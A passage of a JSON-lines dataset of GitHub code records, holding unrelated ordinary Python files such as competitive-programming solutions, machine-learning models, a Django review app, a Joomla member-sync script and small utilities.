sys.stdin.buffer.readline\nsys.setrecursionlimit(10 ** 8)\nINF = float('inf')\nMOD = 10 ** 9 + 7\n\ndef main():\n n = int(input())\n S = input()\n L = [0] * 26\n\n for s in S:\n L[ord(s) - 97] += 1\n\n ans = 1\n for i in range(26):\n if L[i] != 0:\n ans = (ans * (L[i] + 1)) % (10 ** 9 + 7)\n\n print(ans - 1)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p03095/s836822017.py","file_name":"s836822017.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"17347850020","text":"import pickle\nimport pandas as pd\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\n\n# 1. Load the dataset from a CSV file\ndf = pd.read_csv('lang_scores.csv')\n\n# 2. Data cleaning\nprint(df.isnull())\nprint(df.isnull().sum())\ndf.dropna(inplace=True)\ndf.drop_duplicates(inplace=True)\nprint(df.isnull().sum())\n\n# 3. Select the features and target variable\nX = df[['Reading', 'Listening', 'Speaking', 'Writing']]\ny = df['LangLevel']\n\n# 4. Encode categorical variables as numeric\nX = pd.get_dummies(X)\n\n# 5. 
Split the dataset into training and testing sets\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=42)\n\n# 6. Train a decision tree model\nclf = DecisionTreeClassifier()\nclf.fit(X_train, y_train)\n\n# pickle.dump(clf, open(\"model.pkl\", \"wb\"))\n\n\n# 7. Make predictions on the testing set\ny_pred = clf.predict(X_test)\n\n# 8. Evaluate the model's accuracy\naccuracy = accuracy_score(y_test, y_pred)\nprint(\"Accuracy:\", accuracy)","repo_name":"UBSITAntonioBenjamin/LanguageLevel","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"1747681985","text":"import tensorflow as tf\nimport numpy as np\n\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import Layer, Input, Masking, LSTM, Embedding, Dense\n\nclass EndTokenEmbedLayer(Layer):\n def __init__(self):\n super(EndTokenEmbedLayer, self).__init__()\n\n def build(self, input_shape):\n self.embedding_size = input_shape[-1]\n self.embedding = self.add_weight(shape=(self.embedding_size,),\n initializer='random_normal',\n name='end_token_embedding')\n \n def call(self, inputs):\n one_row = tf.reshape(self.embedding,(-1,1,self.embedding_size))\n end_token_output = tf.tile(one_row,[tf.shape(inputs)[0],1,1])\n return tf.concat((inputs,end_token_output),axis=1)\n\ndef Encoder(input_shape):\n inputs = Input(input_shape)\n h = EndTokenEmbedLayer()(inputs)\n h = Masking(mask_value=0.)(h)\n lstm , hidden_state, cell_state = LSTM(512,return_sequences=True,return_state=True)(h)\n model = Model(inputs=inputs, outputs=[hidden_state, cell_state])\n return model\n\nclass Decoder(Model):\n def __init__(self,input_embedding_dim):\n super(Decoder, self).__init__()\n self.embedding = Embedding(input_dim = input_embedding_dim[0],\n output_dim = input_embedding_dim[1],\n mask_zero = True)\n self.lstm = LSTM(units=512, return_sequences=True, return_state=True)\n self.dense = Dense(units=input_embedding_dim[0])\n\n def call(self,inputs,hidden_state = None,cell_state = None):\n h = self.embedding(inputs)\n if hidden_state != None and cell_state != None:\n lstm,hidden,cell = self.lstm(h,initial_state =[hidden_state,cell_state])\n else:\n lstm,hidden,cell = self.lstm(h)\n h = self.dense(lstm)\n return h,hidden,cell\n\nclass NeuralTranslationModel(Model):\n def __init__(self,encoder_input_shape,decoder_input_shape):\n super(NeuralTranslationModel, self).__init__()\n self.encoder = Encoder(input_shape=encoder_input_shape)\n self.decoder = Decoder(input_embedding_dim=decoder_input_shape)\n self.model_trainable_variables = self.encoder.trainable_variables + \\\n self.decoder.trainable_variables \n \n def chinese_data_io(self,chinese_data):\n input_data = chinese_data[:,0:tf.shape(chinese_data)[1]-1]\n output_data = chinese_data[:,1:tf.shape(chinese_data)[1]]\n return(input_data,output_data)\n\n def call(self,inputs):\n (encoder_in, decoder_in)=inputs\n hidden_state ,cell_state = self.encoder(encoder_in)\n dense_output, _, _ = self.decoder(decoder_in, hidden_state, cell_state)\n return dense_output\n\n @tf.function\n def train_step(self,data): \n (english,chinese) = data\n chinese_input, chinese_output = self.chinese_data_io(chinese) \n with tf.GradientTape() as tape: \n hidden_state ,cell_state = self.encoder(english)\n dense_output, _, _ = self.decoder(chinese_input, hidden_state, cell_state)\n loss = 
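# Sketch of what chinese_data_io() above implements -- standard teacher
# forcing: the decoder reads tokens [0..T-2] and is trained to emit [1..T-1].
seq = [101, 7, 8, 9, 102]                     # <start> ... <end>
decoder_in, decoder_target = seq[:-1], seq[1:]
assert decoder_in == [101, 7, 8, 9]
assert decoder_target == [7, 8, 9, 102]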
tf.math.reduce_mean(self.compiled_loss(chinese_output,dense_output))\n grads = tape.gradient(loss, self.model_trainable_variables)\n self.optimizer.apply_gradients(zip(grads,\n self.model_trainable_variables))\n self.compiled_metrics.update_state(chinese_output,dense_output)\n return {m.name:m.result() for m in self.metrics}\n\n @tf.function\n def test_step(self, data):\n (english,chinese) = data\n chinese_input, chinese_output = self.chinese_data_io(chinese) \n hidden_state ,cell_state = self.encoder(english)\n dense_output, _, _ = self.decoder(chinese_input, hidden_state, cell_state)\n loss = tf.math.reduce_mean(self.compiled_loss(chinese_output,dense_output))\n self.compiled_metrics.update_state(chinese_output,dense_output)\n return {m.name:m.result() for m in self.metrics}","repo_name":"raymondngiam/neural-translation-model-eng-to-ch","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18496283809","text":"Row = int(input())\nflag = True\nList = []\nfor i in range (Row):\n List.append(input())\ns_l = set(List)\nif len(List) != len(s_l):\n print(\"No\")\nelse:\n for i in range(Row-1):\n n = len(List[i])-1\n if List[i][n] != List[i+1][0]:\n flag = False\n if flag:\n print(\"Yes\")\n else:\n print(\"No\")","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p03261/s362093478.py","file_name":"s362093478.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"6101398645","text":"# coding=utf-8\n\nimport os\n\nfrom prodtools.utils import fs_utils\nfrom prodtools import TABLES_PATH\n\n\nSYMBOLS_CSV = TABLES_PATH + '/symbols.csv'\nSYMBOLS_HTML = TABLES_PATH + '/symbols.html'\nsymbols = None\n\n\n#§<font face="Symbol">&#167;</font>club&clubs;  is  &#9827;  is  Black club suitWGL4\n#caracter|source html|name|...|...|def|?\n# 0 | 4 | 5 \ndef html2table():\n _items = []\n c = fs_utils.read_file(SYMBOLS_HTML)\n c = c.replace('', '~BREAK~')\n items = [item for item in c.split('~BREAK~') if item.startswith('') and 'Symbol' in item]\n for item in items:\n item = item.replace('')\n cells = item.split('')\n if len(cells) == 7:\n _char = cells[0]\n _ent = cells[4]\n _def = cells[5]\n _char = _char[0:_char.rfind('')]\n _char = _char[_char.rfind('>')+1:]\n _ent = _ent[_ent.rfind('&'):]\n _ent = _ent[0:_ent.rfind(';')+1]\n _items.append(_char + '\\t' + _ent + '\\t' + _def)\n fs_utils.write_file(SYMBOLS_CSV, '\\n'.join(_items))\n\n\ndef load_symbols():\n symbols_items = {}\n for row in fs_utils.read_file_lines(SYMBOLS_CSV):\n cells = row.split('\\t')\n if len(cells) == 3:\n char, ent, descr = cells\n symbols_items[char] = ent\n return symbols_items\n\n\ndef get_symbol(c):\n global symbols\n if symbols is None:\n symbols = load_symbols()\n return symbols.get(c, '?')\n\n\nif not os.path.isfile(SYMBOLS_CSV):\n html2table()\nif os.path.isfile(SYMBOLS_CSV):\n if symbols is None:\n symbols = load_symbols()\n","repo_name":"scieloorg/PC-Programs","sub_path":"src/scielo/bin/xml/prodtools/processing/symbols.py","file_name":"symbols.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"90"} +{"seq_id":"17452738662","text":"import os\nfrom PIL import Image\nfrom torchvision import transforms\nimport cv2\nimport numpy as np\nfrom flowmatch.datasets.utils import 
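# Tiny illustration of the char -> entity lookup get_symbol() above performs
# once symbols.csv is loaded; the two sample rows match the format documented
# in the comment at the top of that file (the real table comes from symbols.html).
table = {'§': '&#167;', '♣': '&clubs;'}

def lookup(c, symbols=table):
    return symbols.get(c, '?')

assert lookup('§') == '&#167;' and lookup('x') == '?'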
random_homography_and_crop, random_crop_bbox, bbox\nfrom flowmatch.datasets.utils_syn import blend, PIL2array1C\nfrom flowmatch.flowutils.compute_flow import affine_flow\nfrom flowmatch.datasets.setting import *\n\nclass BigBirdDataset:\n def __init__(self, root, cfg):\n \"\"\"`MS Coco Captions `_ Dataset.\n Args:\n root (string): Root directory where images are downloaded to.\n cfg (easydict.EasyDict): Config.\n \"\"\"\n self.root = root\n self.cfg = cfg\n\n self._init_transform()\n\n print('Mapping all objects/masks paths ... ', end='', flush=True)\n self.data_pths = self._all_image_path()\n print('done.')\n print('Total {} items in dataset.'.format(len(self.data_pths)))\n\n def __getitem__(self, index):\n \"\"\"\n Args:\n index (int): Index\n Returns:\n tuple: Dict (image, bbox).\n bbox is the (single) bounding box annotation in xyxy format.\n bbox is a continuous float where 0 <= x1,x2 <= width and 0 <= y1,y2 <= height.\n\n * 'fs' is acronym for 'full_scene'.\n * 'cs' is acronym for 'crop_scene'.\n \"\"\"\n\n target_pth, mask_pth = self.data_pths[index]\n fs_im = cv2.imread(target_pth) # acronym for full scene\n tg_mask = 255 - PIL2array1C(Image.open(mask_pth))\n x1,x2,y1,y2 = bbox(tg_mask > 0)\n h,w = x2-x1+1, y2-y1+1\n scale = min(OBJECT_SIZE / max(h,w), 1)\n tg_im = cv2.resize(fs_im[x1:x2+1, y1:y2+1], (int(w*scale), int(h*scale)))\n tg_mask = cv2.resize(tg_mask[x1:x2+1, y1:y2+1], (int(w*scale), int(h*scale)))\n\n # Get crop_scene and homography matrix.\n cs_im, cs_mask, M = random_homography_and_crop(tg_im, tg_mask)\n x1,x2, y1,y2 = bbox(cs_mask > 0)\n dx, dy = y1, x1\n\n # Get homography flow\n h,w = cs_im.shape[:2]\n flow = affine_flow([w,h], [0,0,w-1,h-1], M)\n\n # Paste object into background\n cs_info = blend(Image.fromarray(cs_im), Image.fromarray(cs_mask))\n bbx, cs_im, cs_mask = cs_info['bbx'], cs_info['cs_im'], cs_info['cs_mask']\n\n # Crop object randomly from the blended image\n x1, x2, y1, y2 = bbx\n cs_mask = np.array(cs_mask)\n hp, wp = cs_im.height, cs_im.width\n cs_im, cs_mask, cs_bbox = random_crop_bbox(cs_im, cs_mask, [x1, y1, x2, y2], [1.2, 1.6])\n \n # Translate flow accordingly\n xp1, yp1, xp2, yp2 = np.multiply(cs_bbox, np.array([wp, hp, wp, hp]))\n hp, wp = cs_im.height, cs_im.width\n tg_mask = np.float32(tg_mask > 0)\n flow[:,:,0] = (flow[:,:,0]*w + x1 - xp1 - dx) / wp\n flow[:,:,1] = (flow[:,:,1]*h + y1 - yp1 - dy) / hp\n\n example = {'cs_im': cs_im,\n 'cs_mask': cs_mask,\n 'homography': M,\n 'tg_im': tg_im,\n 'tg_mask': tg_mask,\n 'flow': flow,\n 'img_id': target_pth,\n }\n return example\n\n def __len__(self):\n return len(self.data_pths)\n\n def _init_transform(self):\n # Initialize torch-defined transforms that will be used by self.transform().\n self.transform_ops = {'ToTensor': transforms.ToTensor(),\n 'Normalize': transforms.Normalize(mean=self.cfg.mean, std=self.cfg.std)}\n\n def _all_image_path(self):\n objects = list(filter(lambda x: os.path.isdir(os.path.join(self.root, x)), \n os.listdir(self.root)))\n res = []\n for obj in objects:\n obj_root = os.path.join(self.root, obj)\n img_pths = list(filter(lambda x: x.endswith('.jpg'), os.listdir(obj_root)))\n data = list(map(lambda x: (os.path.join(obj_root, x), \n os.path.join(obj_root, 'masks', x[:-4]+'_mask.pbm')),\n img_pths))\n data = list(filter(lambda x: os.path.exists(x[0]) and os.path.exists(x[1]), data))\n # print('Object {} with {} images'.format(obj, len(data)))\n res += data\n return res\n\n def add_gt_flow(self, example):\n # Get GT optical flow.\n # flow = 
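# The flow rescaling in __getitem__ above re-expresses normalized flow in a
# new crop's frame: un-normalize by the old width, apply the paste/crop/object
# offsets, re-normalize by the new width. Scalar sketch of the same arithmetic:
def renorm_flow_x(u, w_old, w_new, paste_x, crop_x, obj_x):
    return (u * w_old + paste_x - crop_x - obj_x) / w_new

# u = 0.5 in a 100-px frame, pasted at x=20, crop starting at x=10,
# zero object offset -> pixel 60 of a 120-px crop:
assert abs(renorm_flow_x(0.5, 100, 120, 20, 10, 0) - 0.5) < 1e-9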
self._compute_gt_flow(example['resized_tg_im'], example['resized_tg_mask'], example['homography'])\n\n if 'flow' not in example.keys():\n print('flow unavailable for {}'.format(example['img_id']))\n # If flow is not successfully computed, return None to indicate that this example has failed\n return None\n\n # Transform flow.\n\n # Step 1: Centre flow values by shifting range from [0, 1] to [-0.5, 0.5].\n centered_flow = example['resized_flow'] - 0.5\n\n # Step 2: Convert array to tensor.\n example['net_flow'] = self.transform_ops['ToTensor'](centered_flow)\n return example\n","repo_name":"siddancha/FlowVerify","sub_path":"flowmatch/datasets/bigBird.py","file_name":"bigBird.py","file_ext":"py","file_size_in_byte":5026,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"90"} +{"seq_id":"12603069389","text":"# message size and latency and packetloss rate\nimport numpy as np\nimport glob\nimport pandas as pd\nfrom functools import reduce\nfrom tensorflow.keras.models import Sequential, load_model\nfrom tensorflow.keras.layers import Dense, Dropout\nfrom tensorflow.keras import optimizers\nimport matplotlib.pyplot as plt\n# load the dataset\n\npath = r'./msgsize-latency/'\nall_paths = glob.glob(path+'*.csv')\nall_csvs = list(map(lambda x: np.loadtxt(x,delimiter=\",\", skiprows=1, usecols=(2,5,6,7,14,19)), all_paths))\ndataset = reduce((lambda x,y: np.concatenate((x,y), axis=0)), all_csvs)\nnumRecords = dataset.shape[0] # Total number of exp records\nnumTrains = numRecords-5\nparaDim = 1\n\ntrainset = dataset[0:numTrains, :]\ntestset = dataset[numTrains:numRecords, :]\ntrainX = trainset[:,1]\ntrainY = trainset[:,5]\ntestX = testset[:, 1]\ntestY = testset[:, 5]\nmodelTitle = 'mz_ly'\nprint(trainX, trainY)\n# define the keras model\nmodel = Sequential()\nmodel.add(Dense(64, activation=\"relu\", input_dim=paraDim))\nmodel.add(Dense(128, activation=\"linear\"))\nmodel.add(Dense(1, activation=\"linear\"))\n\n# compile the keras model\n\nmodel.compile(loss='mse',\n optimizer=optimizers.RMSprop(lr=0.01),\n metrics=['mae', 'mse', 'accuracy', 'mape'])\n# fit the keras model on the dataset\nhistory = model.fit(trainX, trainY, validation_split=0.25, epochs=5000, batch_size=10)\nmodel.save('./savedModels/'+modelTitle+'/mszLtcy.h5')\n# evaluate the keras model\n\nyPredictions = model.predict(testX)\n\nfig1 = plt.figure()\nplt.scatter(testX, testY)\nplt.scatter(trainX, trainY)\nplt.plot(testX,yPredictions)\nfig1.savefig('./figures/'+modelTitle+'/PredictionResult.png')\n\nfig2 = plt.figure()\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('Model loss')\nplt.xlabel('Epoch')\nplt.ylabel('MSE')\nfig2.savefig('./figures/'+modelTitle+'/lossHistory.png')\n\n","repo_name":"woohan/kafkaPrediction","sub_path":"mz_ly_model1.py","file_name":"mz_ly_model1.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"70663396458","text":"import re\nfrom typing import List, Sequence\n\nfrom autoclick.types import *\nfrom autoclick.utils import get_match_type\n\n\nVALIDATIONS: Dict[Type, List[Callable]] = {}\n\nUNDERSCORES = re.compile(\"_\")\nALPHA_CHARS = set(chr(i) for i in tuple(range(97, 123)) + tuple(range(65, 91)))\n\n\nclass ValidationError(click.UsageError):\n \"\"\"Raised by a validation function when an input violates a constraint.\n \"\"\"\n\n\ndef register_validation(type_: Type, validation_fn: Callable):\n \"\"\"\n\n Args:\n type_:\n 
validation_fn: The validation callable to register for that type.\n    \"\"\"\n    if type_ not in VALIDATIONS:\n        VALIDATIONS[type_] = []\n    VALIDATIONS[type_].append(validation_fn)\n\n\ndef has_validations(type_: Type) -> bool:\n    \"\"\"\n\n    Args:\n        type_: The type to look up.\n\n    Returns:\n        True if at least one validation is registered for the type.\n\n    \"\"\"\n    return type_ in VALIDATIONS\n\n\ndef get_validations(type_: Type) -> Optional[Sequence[Callable]]:\n    \"\"\"\n\n    Args:\n        type_: The type to look up.\n\n    Returns:\n        The validations registered for the type, or None.\n\n    \"\"\"\n    return VALIDATIONS.get(type_, None)\n\n\ndef validation(\n    match_type: Optional[Type] = None,\n    depends: Optional[Tuple[Callable, ...]] = None,\n    decorated: Optional[Callable] = None\n):\n    \"\"\"Annotates a single-parameter validation.\n\n    Args:\n        match_type: The type that will match this validation. If None, is inferred\n            from the type of the first parameter in the signature of the annotated\n            function.\n        depends: Other validations that are pre-requisite for this one.\n        decorated: The function to decorate.\n\n    Returns:\n        A decorator function.\n    \"\"\"\n    def decorator(f: Callable) -> Callable:\n        _match_type = match_type\n        if _match_type is None:\n            _match_type = get_match_type(f)\n\n        if depends:\n            def composite_validation(**kwargs):\n                for dep in depends:\n                    dep(**kwargs)\n                f(**kwargs)\n            target = composite_validation\n        else:\n            target = f\n\n        # Annotated validation functions can only ever validate a single parameter\n        # so we can explicitly specify the param name and value as kwargs to the\n        # decorated function.\n        def call_target(**kwargs):\n            if len(kwargs) == 2 and set(kwargs.keys()) == {\"param_name\", \"value\"}:\n                pass\n            elif len(kwargs) != 1:\n                print(kwargs)\n                raise ValueError(\n                    \"A @validation decorator may only validate a single parameter.\"\n                )\n            else:\n                kwargs = dict(zip((\"param_name\", \"value\"), list(kwargs.items())[0]))\n            if kwargs[\"value\"] is not None:\n                target(**kwargs)\n\n        # Register under the resolved type, so inferred match types work too.\n        register_validation(_match_type, call_target)\n\n        return call_target\n\n    if decorated:\n        return decorator(decorated)\n    else:\n        return decorator\n","repo_name":"jdidion/autoclick","sub_path":"autoclick/validations/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"90"} +{"seq_id":"12028870055","text":"import os\nimport logging\nfrom dotenv import load_dotenv\nfrom files_parser import get_questions\nfrom log_handler import MyLogsHandler\nimport telegram_dialog \nimport vk_dialog\n\n\ndef main():\n\n    logging.basicConfig(format ='%(asctime)s - %(name)s - %(levelname)s - %(message)s ')\n    logger = logging.getLogger('bot_logger')\n    logger.setLevel(logging.INFO)\n    logger.addHandler(MyLogsHandler(my_chat_id = os.environ['QUIZ_TELEGRAMM_CHAT_ID']))\n    logger.info('Quiz error-checking bot started')\n\n    load_dotenv()\n    questions = get_questions('questions')\n    try:\n        telebot = telegram_dialog.MyTelegram_bot(questions)\n        telebot.run_telegram_bot()\n\n        vkbot = vk_dialog.MyVkBot(questions)\n        vkbot.run_vk_bot()\n    except ConnectionError:\n        logger.exception('Connection error') \n\n\nif __name__ == \"__main__\":\n\n    main()\n\n","repo_name":"BespalovSergey/quiz_bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"3143749029","text":"\"\"\"\nSync fields between Joomla Community Builder and Member registry.\n\"\"\"\n\n# imports\nimport sys\nimport os\nimport sqlalchemy\nimport datetime\nfrom sqlalchemy import or_\n\nsys.path.append(os.path.dirname(os.getcwd())) # Add .. 
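# Hypothetical usage sketch for the @validation decorator above; match_type
# is passed explicitly so nothing here depends on get_match_type()'s inference.
@validation(match_type=int)
def positive(param_name: str, value: int):
    if value <= 0:
        raise ValidationError(f"{param_name} must be positive")

positive(count=5)      # ok: remapped to param_name="count", value=5
# positive(count=-1)   # would raise ValidationError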
to path\nfrom backend.ldaplogin import (get_member_with_real_name,\n DuplicateNamesException, PersonNotFoundException)\nfrom backend import connect\nfrom backend.orm import (Member, ContactInformation, Jos_CBFields,\n Jos_Users, Jos_Fields, Jos_Privacy)\n\n# constants\nNOT_VISIBLE = 99\n\n# Jos_CBFields conversions\nCOMPROFDICT = dict(\n cb_streetaddress='streetAddress_fld',\n cb_postalcode='postalCode_fld',\n cb_city='city_fld',\n cb_country='country_fld',\n cb_phone='phone_fld',\n cb_subscribedtomodulen='subscribedtomodulen_fld')\n\n\n# exception classes\n# interface functions\n# classes\n# internal functions & classes\n\ndef get_members(joomlasession, registrysession, username):\n registrymember = registrysession.query(Member).filter(Member.username_fld ==\n username).one()\n joomlamember = joomlasession.query(\n Jos_CBFields).join(Jos_Users).filter(\n Jos_Users.username == username).one()\n return registrymember, joomlamember\n\n\ndef set_field_invisible(joomlasession, joomlamember, joomlafield):\n \"\"\"Set the field invisible on the profile page.\"\"\"\n\n userid = joomlamember.user.id\n fieldid = joomlasession.query(Jos_Fields).filter(\n Jos_Fields.name == joomlafield).one().fieldid\n\n # If privacy rule already exists.\n if joomlasession.query(Jos_Privacy).filter(\n Jos_Privacy.userid == userid).filter(\n Jos_Privacy.xid == fieldid).count() == 0:\n #####\n # Oursql gives an error when adding a privacyrule the normal way\n # https://bugs.launchpad.net/oursql/+bug/805983\n # privacyrule = Jos_Privacy(user = joomlamember.user, type=\"field\",\n # field = field, rule = NOT_VISIBLE)\n # joomlasession.add(privacyrule)\n # joomlasession.commit()\n #\n # Workaround is to execute a convetional SQL insert statement.\n #####\n ins = Jos_Privacy.__table__.insert().values(userid = joomlamember.user.id,\n type=\"field\", xid = fieldid, rule = NOT_VISIBLE)\n joomlasession.connection().execute(ins)\n\n\ndef copy_fields_to_joomla(joomlasession, registrysession, username):\n \"\"\"Copy fields to homepage from members registry for given user.\n\n Also sets the field invisible on the profile page.\n\n Returns True if succesful.\"\"\"\n\n try:\n registrymember, joomlamember = get_members(\n joomlasession, registrysession, username)\n except sqlalchemy.orm.exc.NoResultFound as e:\n print(\"User %s not found\" % username)\n return False\n\n # Copy email field.\n mail = 'email'\n setattr(joomlamember.user, mail,\n getattr(registrymember.contactinfo, 'email_fld'))\n set_field_invisible(joomlasession, joomlamember, mail)\n\n # Copy rest of fields.\n for joomlafield, registryfield in COMPROFDICT.items():\n registryvalue = None\n if hasattr(registrymember, registryfield):\n registryvalue = getattr(registrymember, registryfield)\n else:\n registryvalue = getattr(registrymember.contactinfo, registryfield)\n\n setattr(joomlamember, joomlafield, registryvalue)\n set_field_invisible(joomlasession, joomlamember, joomlafield)\n registrymember.lastsync_fld = datetime.datetime.now()\n\n return True\n\n\ndef copy_fields_to_registry(joomlasession, registrysession, username):\n \"\"\"Copy fields to members registry from homepage for given user.\n\n Returns True if succesful.\"\"\"\n\n try:\n registrymember, joomlamember = get_members(\n joomlasession, registrysession, username)\n except sqlalchemy.orm.exc.NoResultFound as e:\n print(\"User %s not found\" % username)\n return False\n\n # Copy email field.\n mail = 'email_fld'\n setattr(registrymember.contactinfo, mail,\n getattr(joomlamember.user, 'email'))\n\n # Copy 
rest of fields.\n for joomlafield, registryfield in COMPROFDICT.items():\n joomlavalue = getattr(joomlamember, joomlafield)\n setattr(registrymember.contactinfo, registryfield, joomlavalue)\n\n return True\n\ndef get_usernames(joomlasession):\n \"\"\"Get list of usernames on the homepage.\"\"\"\n users = joomlasession.query(Jos_Users).all()\n return [user.username for user in users]\n\ndef get_dirty_from_registry(registrysession):\n \"\"\"Get query with the members to be synced to the homepage\"\"\"\n dirtymembersquery = registrysession.query(Member).join(\n ContactInformation).filter(or_(\n Member.lastsync_fld < Member.modified_fld,\n Member.lastsync_fld < ContactInformation.modified_fld))\n return dirtymembersquery\n\ndef sync_databases(joomlasession, registrysession):\n \"\"\"Sync the member contactinfo fields between the homepage and\n member.registry\"\"\"\n synced_joomla, synced_registry = 0, 0\n usernames = get_usernames(joomlasession)\n\n registrydirtyquery = get_dirty_from_registry(registrysession)\n\n for username in usernames:\n # If member with username must be synced.\n if registrydirtyquery.filter(\n Member.username_fld == username).count() == 1:\n if copy_fields_to_joomla(joomlasession, registrysession, username):\n synced_joomla += 1\n else:\n if copy_fields_to_registry(joomlasession, registrysession,\n username):\n synced_registry += 1\n\n print(\"Synced %d users to homepage\" % synced_joomla)\n print(\"Synced %d users to members registry\" % synced_registry)\n\n\ndef main():\n JoomlaSessionMaker = connect.connect('joomla',\n 'joomla', 'mysql.teknolog.fi', 'joomla', 'mysql+oursql',\n create_metadata=False)\n joomlasession = JoomlaSessionMaker()\n\n RegistrySessionMaker = connect.connect('members',\n 'members', 'postgre.teknolog.fi', 'members')\n registrysession = RegistrySessionMaker()\n\n sync_databases(joomlasession, registrysession)\n registrysession.commit()\n joomlasession.commit()\n\n return 0\n\n\nif __name__ == '__main__':\n status = main()\n sys.exit(status)\n","repo_name":"Teknologforeningen/svaksvat","sub_path":"joomlasync/joomlasync.py","file_name":"joomlasync.py","file_ext":"py","file_size_in_byte":6300,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"90"} +{"seq_id":"7527418756","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom usuario.models import Usuario,Profissional\nfrom avaliacao.models import Avaliacao\nfrom django.contrib.auth.decorators import login_required\nfrom .form import AvaliacaoForm\nfrom django.db.models import Avg\nfrom django.core.paginator import Paginator\nfrom django.contrib import messages\n\n\n@login_required(login_url='usuario:submit_login')\ndef avaliacao(request,id):\n usuario = Usuario.objects.get(id=id)\n profissional = Profissional.objects.get(user=usuario)\n\n if request.method == 'POST':\n form = AvaliacaoForm(request.POST)\n if form.is_valid():\n obj = form.save(commit=False)\n obj.user = request.user\n obj.save()\n messages.success(request, 'Avaliação realizada com Sucesso!')\n return redirect('avaliacao:clientelistarAvaliacoes', id)\n else:\n form = AvaliacaoForm()\n context = {\n 'form': form,\n 'profissional': profissional\n }\n return render(request, 'avaliacao.html', context)\n\ndef listarAvaliacao(request):\n usuario = Usuario.objects.get(id=request.user.id)\n avaliacao = Avaliacao.objects.filter(profissional_id=usuario).order_by('-id')\n paginator = Paginator(avaliacao, 3)\n page = request.GET.get('p')\n avaliacao = paginator.get_page(page)\n 
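# listarAvaliacao above and clientelistarAvaliacoes below repeat the same
# count/average queries; a possible shared helper (sketch, not in the
# original app):
from django.db.models import Avg

def rating_summary(avaliacao_qs):
    return {'total_pessoas': avaliacao_qs.count(),
            'media': avaliacao_qs.aggregate(avg_rating=Avg('nota'))}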
total_pessoas = Avaliacao.objects.filter(profissional_id=usuario).count()\n media = Avaliacao.objects.filter(profissional_id=usuario).aggregate(avg_rating=Avg('nota'))\n context = {\n 'avaliacao': avaliacao,\n 'total_pessoas': total_pessoas,\n 'media':media\n }\n\n return render(request, 'listarAvaliacao.html', context)\n\n\ndef clientelistarAvaliacoes(request,id):\n usuario = Usuario.objects.get(id=id)\n avaliacao = Avaliacao.objects.filter(profissional_id=usuario).order_by('-id')\n paginator = Paginator(avaliacao, 3)\n page = request.GET.get('p')\n avaliacao = paginator.get_page(page)\n total_pessoas = Avaliacao.objects.filter(profissional_id=usuario).count()\n media = Avaliacao.objects.filter(profissional_id=usuario).aggregate(avg_rating=Avg('nota'))\n context = {\n 'avaliacao':avaliacao,\n 'total_pessoas': total_pessoas,\n 'media': media\n\n }\n return render(request, 'clientelistarAvaliacoes.html', context)\n\n","repo_name":"CimaraOliveira/projetoWorkBook","sub_path":"avaliacao/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"29348518375","text":"import time\n\nimport torch\n\nfrom inference import plot_image_from_output\nfrom torchvision import io\nfrom torchvision.transforms import transforms\n\n\ndef predict_image(model, img_path, device):\n image = io.imread(img_path)\n trs = transforms.ToTensor()\n image = trs(image)\n org_image = image\n my_shape = list(image.shape)\n my_shape.insert(0, 1)\n image = image.reshape(my_shape)\n image = image.to(device)\n with torch.no_grad():\n model.eval()\n start = time.time()\n img_pred = model(image)\n stop = time.time()\n print('Labels: ', img_pred[0]['labels'])\n model.train()\n print(f'Predict time: {stop - start}s \\n')\n plot_image_from_output(org_image, img_pred)\n","repo_name":"hoanshiro/CS406","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"44807039156","text":"from lxml import html\nfrom cssselect import GenericTranslator, SelectorError\n\npage = open(\"watch-history.html\", \"r\")\ndoc = html.document_fromstring(page.read())\nsel = doc.xpath(\"//div/a[contains(@href, 'watch')]\")\ncsel = doc.xpath(\"//div/a\")\nselection = []\n\nfor i in sel:\n # if not \"Watched\" in str(i):\n print(str(i.text))\n selection.append(str(i.text))\n\nprint(selection)\nprint(len(selection), len(csel)/2)\n\n\n","repo_name":"skuzzymiglet/old-projects","sub_path":"youtube_analyzer/v2/selector.py","file_name":"selector.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"4243821681","text":"from __future__ import print_function\nfrom __future__ import absolute_import\nfrom ndingest.settings.settings import Settings\nsettings = Settings.load()\nimport 